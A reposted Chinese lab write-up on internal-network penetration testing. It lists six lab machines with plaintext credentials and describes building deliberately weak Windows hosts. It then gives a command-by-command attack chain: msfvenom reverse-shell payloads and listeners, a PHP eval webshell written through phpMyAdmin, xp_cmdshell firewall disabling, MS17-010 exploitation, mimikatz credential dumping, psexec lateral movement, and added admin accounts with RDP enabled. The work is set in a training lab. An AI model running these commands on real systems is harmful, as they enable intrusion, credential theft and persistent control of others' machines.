0x01 实验拓扑图及实验用IP
文章插图
A组IP(实验用IP)
1号
账号:Administrator
密码:Jack@!@#
ip:192.168.141.111
2号
账号:ADMIN-PC/ADMIN
密码:123456hhhh.
222.18.158.244:7771
ip:192.168.141.138
3号
域名:hiro.com
管理员
账号:hiro\administrator
密码:hb123456,./$
域用户
账号:hiro.com/user1
密码:hb123456,./$
ip:192.168.141.100
Tips
里面设了静态ip 要改一下
已将加入过程总结
4号
账号:administrator
密码:Win@2003
ip:192.168.141.114
5号
账号:Administrator
密码:Win@2008
ip:192.168.141.115
6号
账号:Administrator
密码:Edvison233!
ip:192.168.141.116
0x02 环境搭建步骤本模块中的IP只是作为范例,与正式实验中所用IP不同
一号机
系统:Windows 10
IP : 192.168.199.101
对三号机192.168.199.103开放445端口
配置步骤:
- 在虚拟机上安装win10系统
- 在网络共享中心配置静态IP
文章插图
- 对3号机开放445端口:
- 新建入站规则(选择自定义)
文章插图
文章插图
设置端口:
文章插图
指定只对3号机开放:
文章插图
二号机
系统:Windows 7
IP : 192.168.199.102
配置步骤:
安装Windows7 , 设置固定IP
文章插图
三号机
系统:Windows 2012
IP : 192.168.199.103
对192.168.199.104开放445端口
配置步骤:
Windows server 2012 搭建域环境
计算机名:WIN-MT3C3TD4RQD.1.org
所在域名或工作组名称:1.org
IP地址:192.168.199.103
操作系统:Windows Server 2012 R2
密码 hb,./123456
安装步骤
1) 指定AD角色服务器的IP地址(这里的IP地址根据企业实际情况分配,但一定要是固定IP)
文章插图
2) 点击Server2012左下角的“服务器管理器”显示如下界面
文章插图
3) 点击“添加角色和功能按钮”弹出如下界面
文章插图
4) 点击“下一步”
文章插图
5) 这里选择”基于角色或基于功能的安装”,然后点”下一步”
文章插图
6) 服务器选择这里选择默认的,假如你需要针对其它主机安装AD角色,这里可以选择你需要的主机,点击”下一步”
文章插图
7) 这里勾选“Active Directory域服务”,当勾选这个选项时 , 会弹出如下对话框,点“添加功能”就OK
文章插图
8) 这样就正确选择了安装AD角色 , 点击”下一步”
文章插图
9) 功能页面不需要做任何选择直接点“下一步”
文章插图
10) 这里是介绍AD角色的功能及注意事项 , 点击“下一步”
文章插图
11) 勾选”如果需要,自动重新启动目标服务器”,然后点击”安装”
文章插图
12) 安装成功后我们点击“关闭”,但这还没有完全安装成功
文章插图
13) 点击服务器右上角的“功能按钮”
文章插图
14) 弹出继续配置AD的对话框
文章插图
15) 点击”部署后配置”,在红框处填入相应的域名
文章插图
16) 点击“下一步” , 红色方框选择域功能级别,绿色方框选择相应的功能,DNS/GC/RODC,黄色方框输入目录服务还原密码 密码是 hb,./123456
文章插图
17) 点击“下一步”后配置DNS,由于不需要委派DNS,所以这里不需要设置,直接点击”下一步”
文章插图
18) 这一步配置Netbios名,若没有特殊需求默认的就可以,直接点”下一步”
19) 配置日志,数据库,sysvol路径,若没有特殊需求 , 默认就可以
文章插图
20) 查看配置信息,若没有任何问题直接点”下一步”
21) 这个页面是检测是否满足条件,满足条件后就可以直接点”安装”
文章插图
22) 等待机器安装配置项,可能需要重启
文章插图
23) 重启后我们会看到AD角色已经安装完成
文章插图
验证安装
- 直接打开CMD命令行,输入”Net query fsmo”,这时会显示五种角色都已经安装成功
文章插图
- 若要进一步验证AD是否安装正确 , 可以使用DCDIAG /a命令行
文章插图
打开电脑找到控制面板,点击控制面板进入控制面板页面,点击系统和安全选项
进入系统安全页面,点击防火墙选项
进入windows防火墙面板,点击高级设置选项
进入高级设置选项,点击右键新建规则
进入规则想到页面,选择端口,点击下一步
进入设置端口页面,设置需要开放的445端口,点击下一步
选择允许链接,点击下一步
配置文件项,点击下一步
输入名称和描述 , 点击完成
四号机
系统:Windows 2003
本机密码为空
IP : 192.168.199.104
对192.168.199.105开放445端口
留Ms17010漏洞
配置步骤:
静态ip配置
文章插图
设置本机管理员密码为空
文章插图
防火墙配置
文章插图
文章插图
攻击实例
攻击机: kail ip:192.168.246.128 (在本机验证时没有使用192.168.199.1xx的IP地址)
靶机: win 2003 ip:192.168.246.141
配置靶机只对攻击机开放445端口:
先启用防火墙:
文章插图
然后编辑445端口
文章插图
文章插图
点击更改范围,再将攻击机的ip添加上去,这样就配好了 。
文章插图
配置ms17_010漏洞
因为win server 2003 在未打补丁时都有ms17_010漏洞,所以我直接展示利用过程 。
利用msf进行攻击
文章插图
获得shell
文章插图
五号机
系统:Windows server 2008
IP : 192.168.199.105
对192.168.199.106开放80端口
安装PHP study , MySQL弱口令
1、首先完成本机phpstudy及MySQL的安装
文章插图
文章插图
2、配置本机的静态IP为192.168.199.105
文章插图
3、配置防火墙对六号机开放80端口
在命令行中使用wf.msc打开防火墙高级设置
文章插图
文章插图
在入站规则里添加新的规则,设置端口80
文章插图
在新添加的规则右键属性
在作用域里添加本地IP地址为192.168.199.106,即六号机的IP
文章插图
文章插图
六号机
系统:Windows server 2008
IP : 192.168.199.106
对192.168.199.102开放1433端口
Sa账号为弱口令
本机是六号机
操作系统是 windows server 2008
Ip是 192.168.199.106
要求是配置一个sqlserver sa为弱口令的机器
对2号开放1433端口
首先 , 配置sqlserver
下载SQL Server安装程序
双击运行下载的SQL Server安装程序SQLEXPRWT_x64_CHS.exe 。
打开SQLServer安装中心,在右边选择“全新安装或向现有安装添加功能” 。
文章插图
SQL Server开始安装准备 。一直下一步 。
在“数据库引擎配置”中,选择“混合模式” , 并为“SQLServer系统管理员账户(sa)”指定密码,这里设置为弱口令
文章插图
一直下一步 直到安装成功 。
然后设置对二号机开放1433端口
第1步选择“打开或者关闭windows防火墙”把防火墙打开,然后选择“高级设置” , 选择“创建规则”来指定端口 。
文章插图
现在“创建规则”,选择“端口”下–“TCP”和“特定本地端口”然后填写“1433”–下一步–下一步–为这个端口添加一个名称“1433”,然后确定就可以了 。/3、在“入站规则”里选择刚才创建的规则 , 名称是“1433”,然后按照下图顺序就可以了 。
文章插图
文章插图
配置成功
文章插图
以下为内网渗透测试过程
0x03 使用kali拿下二号机通过MobaXterm连接Kali Linux(ip:192.168.141.143),用户名:root , 密码:toor
文章插图
使用下述命令,执行,生成木马文件:
msf -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe
文章插图
生成了test.exe之后,然后在kali里 , 设定端口监听,等待目标上线
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"
文章插图
在2号机上右击,以管理员权限执行 。kali就可以接收到反弹回来的shell 。对shell进行操作 。
在kali里接收到了shell,可在meterpreter中管理shell,开启3389
文章插图
在kali里接收到了shell,可在meterpreter中管理shell,开启3389
run post/windows/manage/enable_rdp添加用户
run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
文章插图
【ms17010漏洞修复 ms17010漏洞怎么修复】然后在服务器主机中,用新添加的账号 , 远程桌面连接2号机,至此完成了对2号机的控制
文章插图
2号机到6号机使用nmap扫描发现192.168.141.116开了1433端口
nmap -p1433 --open 192.168.141.0/24
文章插图
使用ms-sql-brute模块对6号机sa账户进行爆破 , 获得用户名为sa,密码为123456
nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116
文章插图
使用sqltools获取6号机数据库
文章插图
用xp_cmdshell关闭防火墙限制
netsh firewall set opmode mode=disable
文章插图
添加3389入站规则
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
文章插图
创建管理员用户Waldo6TEST
net user Waldo6TEST 1234567hhhh. /addnet localgroup administrators Waldo6TEST /add
文章插图
文章插图
使用用户名Wado6TEST 密码1234567hhhh.成功登陆六号机
文章插图
6号机到5号机发现5号机开放80端口
输入://192.168.141.115/phpmyadmin/,弱口令 用户名root 密码root
文章插图
尝试写入webshell
文章插图
use mysql;CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';Shell写到了:http://192.168.141.115/shell.php
使用菜刀连接
文章插图
执行命令whoami,发现是administrator权限
文章插图
加管理员用户
net user Waldo 1234567hhhh. /addnet localgroup administrators Waldo /add打开5号机3389端口:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
文章插图
连接到远程桌面
文章插图
5号机到4号机在5号机上传ms17010攻击脚本,用kali攻击机生成一个payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe开启msf监听
msfconsole -quse exploit/multi/handlerset lhost 0.0.0.0set lport 6666exploit在5号机中cmd中C:\Users\Waldo\MS17-010-master
在5号机上,运行ms170101攻击脚本(脚本要自己下载)
python zzz_exploit.py 192.168.141.114
文章插图
文章插图
在kali里接收到了shell,可在meterpreter中管理shell,开启3389
run post/windows/manage/enable_rdp添加用户
run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."在5号机远程登录4号机
文章插图
4号机到3号机在4号机中抓取hash
privilege::debugsekurlsa::logonpasswords抓到域控管理员账号和密码:
文章插图
在4号机上,使用以下命令建立IPC$连接
net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"
文章插图
在4号机上,使用以下命令 , 将目标靶机的C盘映射到本地Z盘
net use z: \\192.168.141.100\c$
文章插图
文章插图
使用copy命令将先前生成的shell.exe拷贝至靶机C盘
copy shell.exe \\192.168.141.100\c$
文章插图
在kali上开启监听(6666端口),使用psesec.exe.启动靶机上的shell.exe
p**ec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe
文章插图
成功反弹shell上线:
文章插图
在kali里接收到了shell,可在meterpreter中管理shell , 开启3389
run post/windows/manage/enable_rdp添加用户
run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
文章插图
在4号机远程登录3号机
用户名:hiro\Administrator 密码:hb123456,./$
文章插图
3号机到1号机在3号机上,使用以下命令建立IPC$连接
net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"
文章插图
在3号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘
net use z: \\192.168.141.111\c$
文章插图
文章插图
使用copy命令将先前生成的shell.exe拷贝至靶机C盘
copy shell.exe \\192.168.141.111\c$
文章插图
文章插图
在kali上开启监听(6666端口) , 使用p**ec.exe.启动靶机上的shell.exe
p**ec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./$ c:\\shell.exe
文章插图
成功获取shell
文章插图
打开一号机3389
文章插图
使用用户名:hiro\Administrator 密码: hb123456,./$登录
文章插图
成功拿下一号机,实验成功!
转载自:https://bbs.ichunqiu.com/thread-49988-1-1.html
推荐阅读
- 海藻的保健功效有哪些值得注意
- 如何建立一台公司服务器? 怎么构建公司服务器
- 香椿酱
- 为什么今天无法连接联想服务器? 联想服务器今天怎么连不上
- redis缓存机制有几种 redis中什么是缓存
- 老年人饮食营养新标准
- 如何配置CRL服务器? crl服务器怎么设置
- 日本人看吴阿萍事件 她会判多少年
- 如何查询联想服务器代理商? 联想服务器代理商怎么查询